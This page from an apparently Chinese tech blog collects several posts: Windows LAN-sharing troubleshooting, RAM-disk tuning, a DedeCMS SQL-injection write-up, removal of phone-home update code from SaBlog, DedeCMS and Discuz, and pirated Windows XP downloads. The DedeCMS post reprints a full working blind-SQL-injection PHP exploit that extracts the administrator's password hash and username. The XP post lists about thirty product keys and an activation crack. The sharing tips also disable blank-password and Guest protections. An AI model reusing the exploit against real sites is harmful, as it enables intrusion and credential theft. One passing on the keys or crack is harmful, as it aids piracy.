正在加载...
分页: 154/186 第一页 上页 149 150 151 152 153 154 155 156 157 158 下页 最后页 [ 显示模式: 摘要 | 列表 ]

局域网访问故障解决

[ 2008/08/13 12:31 | by selboo ]

一:局域网共享的条件:

      1:客户机和服务器必须处于相同的网段,且在本地连接中安装有“Microsoft网络客户端”和“Microsoft网络的文件和打印机共享”
      2:客户机和服务器处于相同的工作组,且计算机名不能相同。
      3:服务端安装有server服务。

二:客户机访问服务器共享(正常)时出现的3种现象:

      1: 直接进入共享目录。
      原因: 服务器启用了Guest用户且在本地安全策略----安全选项-----网络访问:本地帐户的共享和安全模式, 设置为“仅来宾-本地用户以来宾身份验证”

      2:弹出输入用户名和密码的输入框。
      原因:服务器在本地安全策略----安全选项-----网络访问:本地帐户的共享和安全模式, 设置为“经典-本地用户以自己的身份验证”
      技巧:出现这种情况,如果在客户机访问时不想输入用户名和密码,可将客户机的用户名和密码设置相同,这样在访问时就不需要用户名和密码了。

     3:弹出输入用户名和密码的输入框,且用户名不能修改(为灰色),默认是Guest
      原因:服务器禁用了Guest用户且本地安全策略----安全选项-----网络访问:本地帐户的共享和安全模式, 设置为“仅来宾-本地用户以来宾身份验证”。

三:局域网常见故障及解决方法。(以下出现的错误提示框全为客户机访问服务器共享资源时出现的)

      1:错误提示框:用户帐户限制,可能的原因包括不允许空密码,登陆时间.....
      原因:windows共享时默认不允许空密码的用户名访问。
      解决:·在服务器上给用户设置密码
      ·服务器上打开“开始”----“运行”-----“gpedit.msc”-------“计算机配置”下的“windows设置”------“安全设置”--------“本地策略”-----“安全选项”,找到“帐户:使用空白密码的本地帐户只允许控制台登录”改为“已禁用”。这样就可以用空白密码的用户名访问共享资源了。

      2:错误提示框:找不到网络路径
      原因1:服务器上开了防火墙且禁用了端口,只要关闭防火墙或者开启共享端口即可。
      原因2:停止了workstation服务导致。此服务的作用是创建和维护到远程服务的客户端网络连接,只要开启该服务即可。

      3:错误提示框:未授权用户在此计算机上的请求登录类型。
      原因:这是因为计算机拒绝了其他计算机从网络访问这台计算机。(如XP默认拒绝Guest用户从网络访问)
      解决:以Guest为例,服务器上打开“开始”----“运行”-----“gpedit.msc”-------“计算机配置”下的“windows设置”------“安全设置”-------“本地策略”-----“用户权利指派”,找到“拒绝从网络访问这台计算机”-------删除Guest用户即可。这样Guest就可以从网络访问这台计算机了,也就可以访问服务器上的共享资源了。如果是其他用户,方法相同。

      4:错误提示框:指定的网络不再可用
      原因:这是因为服务器完成共享后又关闭了server服务
      解决:重新启动server服务。如果在服务列表中找不到server服务,那么就是没有安装“microsoft网络中文件和打印机共享”服务,只要在本地连接属性中安装该服务即可在服务列表中找到server服务。

      5:错误提示框:此工作组的服务器列表当前无法使用
      原因:这是因为服务器没有启用computer browser服务。这个服务不一定要启用,不过同一工作组内至少要有一台机子启用此服务。此服务的主要功能是维护网络上计算机的更新列表。
      解决:重新启动该服务,如果在服务列表中找不到computer browser服务,说明你本地连接没有安装“Microsoft网络客户端”,只要在本地连接属性中安装该客户端即可在服务列表中找到computer browser服务。

虚拟内存的优化设置

[ 2008/08/13 12:11 | by selboo ]

      看了很多网友对虚拟内存设置的己见,探讨的过程十分热火,有说设为实际内存使用的1.5倍,有说2.5倍的等等,说的都各有各的道理,但是,时代是与时俱进的,那些办法,呵呵,或许该过时了...

      众所周之,虚拟内存的作用就是在硬盘上划出一块空间来用在当PC内存空间不够时的临时数据交换场所,实属内存黄金时期迫不得已的产物,要知道内存与硬盘的速度可是天壤之别(SSD除外)

      这时有博友问了?那这么说来,在现如今内存白菜价的时期,这个迫不得已的产物是不是可以消失了?没错!我要告诉你这么想完全是对的!但是!注意了,有些软件却没有与时俱进,他们在设计之初就写好了策略,当运行时会侦测你有没有设置虚拟内存,没有或是设置小了都会出现警告(PS在这首排第一,8版本以前的都会出现,8版本以后的觉着没以前的经典,所以没怎么用过,感兴趣的朋友可以试试,但估计好也不到哪去),苦恼之于是不是很难取舍?设了虚拟磁盘影响速度,不设某些软件又会出现烦人的警告,难舍难分之下就真的没有更好的办法了吗?呵呵,那到未必

      主角登场,“虚拟磁盘”!(页末有下载)一个很好用的软件,原理是把内存中的一块空间规划出来当作磁盘使用,这就完美解决了我们所顾虑的问题,另外,你还可以把规划出来的空间当作你下载文件的默认路径和临时文件的保存场所,这样对磁盘养护及系统安全来说可是莫大的福分,但别忘了,内存断电可是不保存数据的,关机前别忘了把重要的东西Copy出来,其次规划出来的空间想要什么格式都可以。软件运行后操作很简单,我就不配图了,典型的下一步,只需要在出现提示“使用多少内存空间和需要设为什么盘符时人为干涉一下,这里给点建议(最大取8GB)

物理内存   使用环境    总大小     虚拟内存    临时文件及下载

    2GB        正常    1300MB       384MB            剩余

    2GB      高负荷     786MB       384MB            剩余

    4GB        正常    2554MB       384MB            剩余

    4GB      高负荷    1538MB       384MB            剩余

   4GB以上   高负荷    1538MB       384MB            剩余

   4GB以上   视屏狂    4096MB       384MB            剩余

  4 GB以上   下载狂    6656MB       384MB            剩余

      1GB的用户建议还是欣赏欣赏就行,设置完成后,就与平时设置虚拟内存的步骤一样了,把之前的页面文件勾选为无页面文件,点击设置,然后选中你所设虚拟磁盘的盘符,输入上图的建议大小,完成后别忘了点设置,随后重启即可,这时可能会有博友发问,为什么把“临时文件及下载”的空间留那么大,岂不是很浪费吗?呵呵,别着急,你只要保证给系统留1GB左右,页面文件300MB左右,使用环境只要不特殊,完全可以把剩下的空间全部留给“临时文件及下载用”,这时又有博友发问了,为什么需要这个临时文件空间呢?

      呵呵,这儿就是利用了内存的断电不可保存性和传输速度极快的特征,正因为这块空间断电不保存,在你上网时所输入的账号密码以及一些网页缓冲文件在重启后都会消失,从而不给任何病毒木马窃取你数据的机会,这对系统的安全性会起到很好的防护作用,其次看优酷、土豆等等的视屏时,缓冲文件会很大,所以尽可能多的给临时文件留足空间是个不错的选择。

      我们知道下载数据是一个硬盘持续读写的过程,殊不知,长期以往会减少硬盘寿命,尤其是BT类的下载,对此我有切身的体会!我曾经就报废过一块希捷SATA 160GB硬盘,用了还不到一年,就是因为长期的BT下载致使硬盘在使用后期出现长时间尖叫、速度缓慢等等很致命的问题,修肯定是可以的,但性能和以前是没法比了,只是我个人属于BT的DIY型,随手就拆开看看哪出毛病了,可谁知它里面是真空的.....这下想修都没办法了,还好每个区都幽灵了,损失不算很大。大伙要引以为戒啊!

      这样,持续读写的重担就撇给内存了,它可不像硬盘那么挑剔,只要你空间够大,怎么下都行,但切忌关机前别忘了Copy出来哦。有博友遇到不解的问题可以随时给我留言o(∩_∩)o...
Tags: ,

DeDeCmS注射漏洞

[ 2008/08/13 11:00 | by selboo ]

      漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从 DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

      漏洞厂商:http://www.dedecms.com

      漏洞来源:http://www.80sec.com/release/dedecms-sql-injection.txt

      漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下

if(empty($orderby)) $orderby = 'pubdate';

//重载列表
if($dopost=='getlist'){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数
$dsql->Close();
exit();
……
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;

$dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
$dsql->Execute();//orderby 带入数据库查询


漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档):


<?
print_r('
--------------------------------------------------------------------------------
DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
BY Flyh4t
www.wolvez.org
Thx for all the members of W.S.T and my friend Oldjun
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].’ host path
host: target server (ip/hostname)
path: path to DEDEcms
Example:
php ‘.$argv[0].’ localhost /
——————————————————————————–
‘);
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80′);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix=”dede_”;
$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;

if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))
{echo ‘Error… check the path!’; die;}

/*get $prefix*/
$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (eregi(”in your SQL syntax”,$html))
{
$temp=explode(”From “,$html);
$temp2=explode(”member”,$temp[1]);
if($temp2[0])
$prefix=$temp2[0];
echo “[+]prefix -> “.$prefix.”\n”;
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo “[~]exploting now,plz waiting\r\n”;

/*get password*/
$j=1;$password=”";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”\r\n”;break;}
}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

/*get userid*/
$j=1;$admin=”";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”\r\n”;break;}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

print_r(’
——————————————————————————–
[+]userid -> ‘.$admin.’
[+]pwd(md5 24位) -> ‘.$password.’
——————————————————————————–
‘);
function is_hash($hash)
{
if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo “Exploit succeeded…”;}
else {echo “Exploit failed…”;}
?>


dedecms注射漏洞:http://www.80sec.com/dedecms-sql-injection.html
Tags:

SaBlog漏洞

[ 2008/08/12 14:06 | by selboo ]
      今天先去红狼看了看我昨天问的问题,目前没人能回答.收到管理员的消息,应该是群发的,SABLOG又出漏洞了.去官方一看,还是那个编码的,跟DZ类似的漏洞.最近漏洞好多啊.
登录BLOG后台,果然弹出提示框了.
我倒不怎么关心提示框,SABLOG怎么知道我的版本有漏洞呢,程序肯定有后门.每次登陆后台自动检测官方版本跟当前版本对比.嗯.后来找到了.在templates/admin/main.php最后的一部分.删掉如下代码就OK了.
其实这个不足以导致被黑的,现在一般有点常识的,密码都比较复杂,几个数字+几个字母,MD5的话一般很难跑出来.当然有彩虹表的话,另说...

<script type="text/javascript">
i=1;
var autourl=new Array();
autourl[1] = 'www.sablog.net';
autourl[2] = 'cnc.sablog.net';
function auto(url){
if(i){
i=0;
var oHead = document.getElementsByTagName('head').item(0);
var oScript= document.createElement("script");
oScript.type = "text/javascript";
oScript.src = "http://"+url+"/update.php?version=$now_version&release=$now_release&hostname=$now_hostname";
oHead.appendChild(oScript);
}
}
function run(){
for(var i=1;i<autourl.length;i++) {
document.write("<img src=http://"+autourl+" width=1 height=1 onerror=auto('"+autourl+"')>");
}
}
run();
</script>


目前流行的程序里,不止SABLOG一个,Discuz,DEDECMS都是有这样的后门的.这样的后门官方的真正用意很难说.
为了让用户及时得到最新的补丁,最新的版本是一方面,其他的,随便人家怎么发挥了...
但是这个东西有好的一面,也有坏的一面,一旦官方被黑,后果可想而知,所有的用户就被"批量挂马"了.
现在干脆都给发出来吧.先来个DEDECMS的,标示出来的删掉就行:

/include/inc_functions.php

function GetNewInfo(){
if(!isset($GLOBALS['__funAdmin'])) require_once(dirname(__FILE__)."/inc/inc_fun_funAdmin.php");
return SpGetNewInfo();
}


/include/inc/inc_fun_funAdmin.php

function SpGetNewInfo(){
global $cfg_version;
$nurl = $_SERVER["HTTP_HOST"];
if( eregi("[a-z\-]{1,}\.[a-z]{2,}",$nurl) ){ $nurl = urlencode($nurl); }
else{ $nurl = "test"; }
$gs = "<iframe name='stafrm' src='http://www.dedecms.com/newinfo.php?version=".urlencode($cfg_version)."&formurl=$nurl' frameborder='0' id='stafrm' width='100%' height='50'></iframe>";
return $gs;
}


dede/index_body.php(其中dede为后台目录)

<div class="bodytitle">
<div class="bodytitleleft"></div>
<div class="bodytitletxt">DedeCms最新消息</div>
</div>
<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr><form name="uploadspider" action="upload_spider.php" method="post">
<td height="80" class="main_dnews">
<?php echo GetNewInfo()?> </td>
</form>
</tr>
</table>


再把DZ的"后门"发出来吧.admin\global.func.php里面查找"function cpfooter",替换成如下的function:

function cpfooter() {
global $version, $adminid, $db, $tablepre, $action, $bbname, $charset, $timestamp, $isfounder, $insenz;
global $_COOKIE, $_SESSION, $_DCOOKIE, $_DCACHE, $_DSESSION, $_DCACHE, $_DPLUGIN, $sqldebug, $debuginfo;
$infmessage = '';
?>

<?=$infmessage?>

<?php echo $sqldebug;?>
</div>
</body>
</html>
<?php
updatesession();
}


这个文件中还有一个function,没必要的,可以去掉:

function bbsinformation() {

global $db, $timestamp, $tablepre, $charset, $bbname, $_SERVER, $siteuniqueid, $save_mastermobile;
$update = array('uniqueid' => $siteuniqueid, 'version' => DISCUZ_VERSION, 'release' => DISCUZ_RELEASE, 'php' => PHP_VERSION, 'mysql' => $db->version(), 'charset' => $charset, 'bbname' => $bbname, 'mastermobile' => $save_mastermobile);

$updatetime = @filemtime(DISCUZ_ROOT.'./forumdata/updatetime.lock');
if(emptyempty($updatetime) &#124;&#124; ($timestamp - $updatetime > 3600 * 4)) {
@touch(DISCUZ_ROOT.'./forumdata/updatetime.lock');
$update['members'] = $db->result_first("SELECT COUNT(*) FROM {$tablepre}members");
$update['threads'] = $db->result_first("SELECT COUNT(*) FROM {$tablepre}threads");
$update['posts'] = $db->result_first("SELECT COUNT(*) FROM {$tablepre}posts");
$query = $db->query("SELECT special, count(*) AS spcount FROM {$tablepre}threads GROUP BY special");
while($thread = $db->fetch_array($query)) {
$thread['special'] = intval($thread['special']);
$update['spt_'.$thread['special']] = $thread['spcount'];
}
}

$data = '';
foreach($update as $key => $value) {
$data .= $key.'='.rawurlencode($value).'&';
}

return 'update='.rawurlencode(base64_encode($data)).'&md5hash='.substr(md5($_SERVER['HTTP_USER_AGENT'].implode('', $update).$timestamp), 8, 8).'×tamp='.$timestamp;
}


还有admin/home.inc.php,大概193~196行(DZ6.1.0 UTF-8官方原版),这里:

showtablerow('', array('class="vtop td24 lineheight"', 'class="lineheight smallfont"'), array(
lang('home_discuz_version'),
'Discuz! '.DISCUZ_VERSION.' Release '.DISCUZ_RELEASE.' <a href="http://www.discuz.net/forumdisplay.php?fid=10" class="lightlink smallfont" target="_blank">'.lang('home_check_newversion').'</a> '
));


虽然说这里没有直接与官方进行通信,但是,,,我看着不爽,想打补丁自己常去官方看就是了.还有所有文件名中包含insenz的文件,用不着的话就直接删除.没什么用.
Tags:

一、Windows XP SP2 简体中文零售版

卷标:VRMPFPP_CN

文件大小:600M

md5值:a1ba6a76c995c453c5b12ec5c1ab4a67

SHA1:92934976213bb9201057281a200f84127be0050d

ISO/CRC:FFFFFFFF

  据一些论坛的朋友称此版比大客户版VOL要稳定些,是需要激活的纯净的安装版!是否属实,本人正在测试。欢迎各位朋友交流、探讨。
  
  下载地址:我的纳米网络硬盘 (注:此方法是最快的,但需要安装纳米机器人)

  安装序列号:BX6HT-MDJKW-H2J4X-BX67W-TVVFG(安装前请记下,不能用vol版的序列号)。安装后需要手动激活,激活文件见附件。

  再提供一个下载地址:ed2k://|file|VRMPFPP_CN.iso|6213 ... 6CW4SNKVYICXWQV|/tN (此地址下载速度很慢)

  此版安装完有很多补丁需要自己打上,可以用雨林的补丁集,很快的一会就打完所有的补丁。下载请点击:最新补丁全集

二、Windows XP SP3 简体中文零售版

发布日期:(UTC):5/1/2008 11:01:59 PM

SHA1:69dbf131116760932dcf132ade111d6b45778098

MD5:534314ec312e8407cfdc6ef1ff21b804

ISO/CRC:FFFFFFFF

1、迅雷直接点击下载:Windows XP SP3 简体中文零售版(很慢)

2、网络硬盘下载(需安装RaySource软件)

下载地址:http://www.fs2you.com/en/files/b9905975-18e9-11dd-8b8b-0014221b798a/

安装序列号:

FVYD-GDP9X-GGY8T-9PQ8Y-6273D
VRKYC-RXK3B-H7HW2-B3J9D-TMQGD
R9BCP-VF23P-BB6YM-JPYGQ-CT48Y
HM936-QBMRV-Y2QKP-FV4BG-XX38Y
PWFT4-24BFM-YFX6T-QJJ48-Q9968
XKTQX-9J7YK-HRHCM-CW6HW-XV9V6
F6DXK-4YM2R-TJKM2-KHRGY-C7DCW
B9QXV-QCHR4-CVGR3-4DDKQ-KK7VQ
QCMGX-P44QJ-872MM-T82M3-4VWDW
TB4JQ-PMG2C-32C9J-4FX3P-9FDTG
BD9HC-83KR8-DMT9M-69RPQ-CW9FM
Q3GHH-PBFB8-GGMWT-KXBPM-HWQVQ
WD6GB-Y6X67-RKPGJ-W2RH2-WFD7Q
QDTMY-HT7JG-XMTT8-R9K9H-26Y2B
TBKF7-8PCDP-72487-7MV4W-7KTV3
HFYQM-3QBBB-WG3QG-XW9HH-7GTMQ
H7W7J-J8DKC-2WMF8-9JCRQ-BK6VT
HG9P2-FRQYD-66FVJ-MTPVQ-QCVW3
QYP7J-WQ76Q-R2J8K-2VCPP-VPD88
BHX24-8486D-2W99H-VQCXJ-Y6B3M
Q48G9-YCJ78-X4QT8-TYXJ2-YDXD8
C3BC9-TT4YX-3BMVK-XP7H8-G3QXW
RKR78-X3QXT-R39X9-69PJ6-KDGT8
WG7J4-KWJP7-WDBKG-X7QG4-FRYBM
HG24K-JX984-QFQ4X-BR2XM-2C4H3
H6QTC-6YHK2-HX7YT-VD4HP-BBTWJ
HWT63-P9QBW-XQD88-4CHY9-3BTDM
QFJYQ-MT473-K4W7Y-W4KJB-9D2X8

    三、激活方法

    以上两个版本我已下载测试,是正宗的原版,追求完美的朋友可以下载一试。安装后需要手动激活,不过我介绍一款自动激活工具,可以一次完成激活与破解。

    下载xpoem激活工具,下载地址:http://www.fs2you.com/zh-cn/files/911cca85-4762-11dd-88f6-00142218fc6e/

    下载后重新启动电脑进入安全模式,解压打开XPOEM免激活程序并运行,重启,系统已成为oem版,并已激活!进入微软正版验证地址,可以顺利通过!

    说明:安装SP3零售版时可以先不输入序列号,进入系统后有激活提示,不要管他,用工具在安全模式下直接激活就可以去掉

    这种方法照样适用vol版,vol版也有key被封的可能,但oem就不太可能的。B软件只是把系统中的几个文件替换成了oem的,对系统没有影响,请放心使用!
Tags:
分页: 154/186 第一页 上页 149 150 151 152 153 154 155 156 157 158 下页 最后页 [ 显示模式: 摘要 | 列表 ]